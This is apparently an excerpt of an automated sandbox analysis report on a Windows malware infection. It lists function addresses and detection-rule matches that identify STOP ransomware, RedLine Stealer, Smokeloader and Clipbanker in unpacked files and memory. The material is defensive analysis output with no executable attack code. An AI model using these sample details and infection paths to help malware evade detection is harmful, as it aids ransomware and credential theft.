Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040837D	9_2_0040837D
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040C3ED	9_2_0040C3ED
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_0040E7B1	9_2_0040E7B1
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E61B9	9_2_008E61B9
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E7D1F	9_2_008E7D1F
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E5690	9_2_008E5690
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E36C0	9_2_008E36C0
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E7E3F	9_2_008E7E3F
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E2F30	9_2_008E2F30
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00412C56	11_2_00412C56
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00410CE6	11_2_00410CE6
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00411237	11_2_00411237
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00413767	11_2_00413767
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00411788	11_2_00411788
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17911178	12_2_00007FFD17911178
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17911988	12_2_00007FFD17911988
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD17917708	12_2_00007FFD17917708
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007FFD1791509C	12_2_00007FFD1791509C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF991968	12_2_00000156EF991968
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF992558	12_2_00000156EF992558
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF99455C	12_2_00000156EF99455C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF995994	12_2_00000156EF995994
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF995094	12_2_00000156EF995094
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF9922B3	12_2_00000156EF9922B3
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF995414	12_2_00000156EF995414
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00000156EF9929F8	12_2_00000156EF9929F8
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF8718	12_2_00007DF449AF8718
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF36A0	12_2_00007DF449AF36A0
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF15E4	12_2_00007DF449AF15E4
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B89964	12_2_00007DF449B89964
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B21900	12_2_00007DF449B21900
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF9828	12_2_00007DF449AF9828
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B4F864	12_2_00007DF449B4F864
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B2B77C	12_2_00007DF449B2B77C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B29B34	12_2_00007DF449B29B34
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B6EB34	12_2_00007DF449B6EB34
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B85B3C	12_2_00007DF449B85B3C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B66AA0	12_2_00007DF449B66AA0
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B2C9FC	12_2_00007DF449B2C9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B44A18	12_2_00007DF449B44A18
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AF99F0	12_2_00007DF449AF99F0
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B79D58	12_2_00007DF449B79D58
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B3BC88	12_2_00007DF449B3BC88
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B21C4C	12_2_00007DF449B21C4C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B20C58	12_2_00007DF449B20C58
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AE3C68	12_2_00007DF449AE3C68
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B5AE88	12_2_00007DF449B5AE88
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B20E98	12_2_00007DF449B20E98
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B06E60	12_2_00007DF449B06E60
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AEFE38	12_2_00007DF449AEFE38
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449BA2DE4	12_2_00007DF449BA2DE4
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B40DF0	12_2_00007DF449B40DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B2B0C8	12_2_00007DF449B2B0C8
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B58090	12_2_00007DF449B58090
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B21224	12_2_00007DF449B21224
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AE1530	12_2_00007DF449AE1530
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B2D558	12_2_00007DF449B2D558
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B784C4	12_2_00007DF449B784C4
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B2A3F4	12_2_00007DF449B2A3F4
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AE03D8	12_2_00007DF449AE03D8
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B4673C	12_2_00007DF449B4673C
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B33754	12_2_00007DF449B33754
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B636E8	12_2_00007DF449B636E8
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B6A698	12_2_00007DF449B6A698
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449AED608	12_2_00007DF449AED608
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B275A8	12_2_00007DF449B275A8

Source: C:\Windows\explorer.exe	Section loaded: windows.web.dll			Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll			Jump to behavior

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.DC3D.exe.22d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.A4A.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.A4A.exe.23e15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.ECAC.exe.23d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.DC3D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.rundll32.exe.156f1980000.45.unpack, type: UNPACKEDPE	Matched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 18.2.A4A.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 31.2.DC3D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.ECAC.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.42FE.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 13.2.A4A.exe.23e15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.rundll32.exe.156f18d0000.13.unpack, type: UNPACKEDPE	Matched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 29.2.ECAC.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 27.2.DC3D.exe.22d15a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 25.2.ECAC.exe.23d15a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.rundll32.exe.156f174f9c8.55.unpack, type: UNPACKEDPE	Matched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.A4A.exe.23215a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 42.2.A4A.exe.23215a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 12.3.rundll32.exe.156f174f9c8.56.unpack, type: UNPACKEDPE	Matched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
Source: 12.3.rundll32.exe.156f174f9c8.57.unpack, type: UNPACKEDPE	Matched rule: SUSP_ENV_Folder_Root_File_Jan23_1 date = 2023-01-11, author = Florian Roth (Nextron Systems), description = Detects suspicious file path pointing to the root of a folder easily accessible via environment variables, score = , reference = Internal Research
Source: 0000000E.00000002.705303961.0000000000606000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.439049903.00000000005E6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000E.00000002.706906368.0000000002210000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.287939420.0000000000580000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.288156883.0000000000746000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000010.00000002.427978506.00000000005F6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000014.00000002.438844235.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.375761103.00000000021C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
